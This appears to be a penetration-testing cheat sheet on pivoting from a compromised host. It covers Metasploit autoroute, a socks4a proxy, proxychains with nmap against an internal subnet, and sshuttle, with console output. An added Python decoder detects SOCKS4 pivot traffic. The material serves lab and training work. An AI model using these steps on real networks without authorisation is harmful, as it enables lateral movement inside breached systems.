Port Forwarding

Pivoting with Metasploit

Four steps, after a shell on a remote host has been obtained:

  1. autoroute from meterpreter

  2. socks proxy from msfconsole

  3. modify /etc/proxychains.conf

  4. proxychains

Step 1

From a meterpreter session on the compromised machine, add a route for the target subnet:

meterpreter > run autoroute -s 172.16.2.0/24

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 172.16.2.0/255.255.255.0...
[+] Added route to 172.16.2.0/255.255.255.0 via 10.10.110.3
[*] Use the -p option to list all active routes
meterpreter > run autoroute -p

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   172.16.2.0         255.255.255.0      Session 4

In the example above, the compromised machine is 172.16.1.20, which sits in the 172.16.1.0/24 subnet. We are trying to reach the 172.16.2.0/24 subnet, so the added route sends traffic for that subnet through the Meterpreter session (Session 4 in the routing table).

Step 2

Background the meterpreter session and use the module:

use auxiliary/server/socks4a

Set SRVHOST to your (attacking) IP address; the listener then accepts SOCKS4a connections on SRVPORT (1080 by default) and forwards them over the routed session.

meterpreter > background
[*] Backgrounding session 4...
msf5 exploit(windows/smb/psexec) > use auxiliary/server/socks4a
msf5 auxiliary(server/socks4a) > show options

Module options (auxiliary/server/socks4a):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The address to listen on
   SRVPORT  1080             yes       The port to listen on.


Auxiliary action:

   Name   Description
   ----   -----------
   Proxy  Run SOCKS4a proxy


msf5 auxiliary(server/socks4a) > set SRVHOST 10.10.14.6
SRVHOST => 10.10.14.6
msf5 auxiliary(server/socks4a) > run

Step 3

Modify /etc/proxychains.conf so that the socks4 entry points to your IP address and port, as specified by SRVHOST and SRVPORT in Metasploit.

#socks4 	127.0.0.1 9050
socks4 10.10.14.6 1080

# In this example, 10.10.14.6 is the IP of the Kali machine.

Step 4

Run nmap (or other tools) through proxychains, which wraps their connections in SOCKS4 requests to the Metasploit listener:

proxychains nmap 172.16.2.101
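To see what proxychains actually hands to the socks4a listener from Step 2 (and to recognise the same traffic on a network sensor, since a SOCKS listener appearing on a host is a strong pivoting indicator), here is an added decoder for SOCKS4/SOCKS4a client requests. It is not part of the original notes; the sample requests, the userid string and the hostname are constructed.

```python
import ipaddress
import struct

# Constructed sample: a SOCKS4 CONNECT for 172.16.2.101:445, the shape of request
# proxychains sends to the listener when nmap probes a host in Step 4.
# Layout: VN(1)=4, CD(1)=1 CONNECT / 2 BIND, DSTPORT(2, big-endian), DSTIP(4),
# USERID (NUL-terminated). SOCKS4a adds a NUL-terminated hostname when DSTIP is 0.0.0.x (x != 0).
SAMPLE_SOCKS4 = b"\x04\x01" + struct.pack("!H", 445) + bytes([172, 16, 2, 101]) + b"proxychains\x00"
# Constructed SOCKS4a variant: proxy-side DNS resolution of a hostname, empty userid.
SAMPLE_SOCKS4A = b"\x04\x01" + struct.pack("!H", 445) + b"\x00\x00\x00\x01" + b"\x00" + b"fileserver.internal\x00"


def parse_socks4_request(data: bytes) -> dict:
    """Decode a SOCKS4/SOCKS4a client request; raise ValueError on anything malformed."""
    if len(data) < 9:
        raise ValueError("too short for a SOCKS4 request")
    vn, cd, port = struct.unpack("!BBH", data[:4])
    if vn != 4:
        raise ValueError(f"not SOCKS4 (VN={vn})")
    if cd not in (1, 2):
        raise ValueError(f"unknown command {cd}")
    raw_ip = data[4:8]
    rest = data[8:]
    nul = rest.find(b"\x00")
    if nul == -1:
        raise ValueError("USERID not NUL-terminated")
    userid = rest[:nul].decode("ascii", errors="replace")
    rest = rest[nul + 1:]
    hostname = None
    # SOCKS4a extension: DSTIP 0.0.0.x (x != 0) means "proxy resolves the hostname that follows".
    if raw_ip[:3] == b"\x00\x00\x00" and raw_ip[3] != 0:
        nul = rest.find(b"\x00")
        if nul == -1:
            raise ValueError("SOCKS4a hostname not NUL-terminated")
        hostname = rest[:nul].decode("ascii", errors="replace")
    return {
        "command": "CONNECT" if cd == 1 else "BIND",
        "dst_port": port,
        "dst_ip": None if hostname else str(ipaddress.IPv4Address(raw_ip)),
        "dst_host": hostname,
        "userid": userid,
    }


def is_socks4_request(data: bytes) -> bool:
    """Cheap classifier for a sensor: does the first client segment on a flow look like SOCKS4/4a?"""
    try:
        parse_socks4_request(data)
        return True
    except ValueError:
        return False
```

Running the classifier over the first client segment of flows to port 1080 (or any port where SRVPORT was set) shows which internal destinations are being reached through the proxy.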

Pivoting with sshuttle

sshuttle creates an easy-to-use VPN-like connection over SSH for pivoting across networks: traffic for the given subnet is transparently forwarded through the pivot host. The command format is:

# sshuttle -vr USER@PIVOT_IP_ADDRESS NETWORK/CIDR

sshuttle -vr user@10.10.110.162 172.16.3.0/24
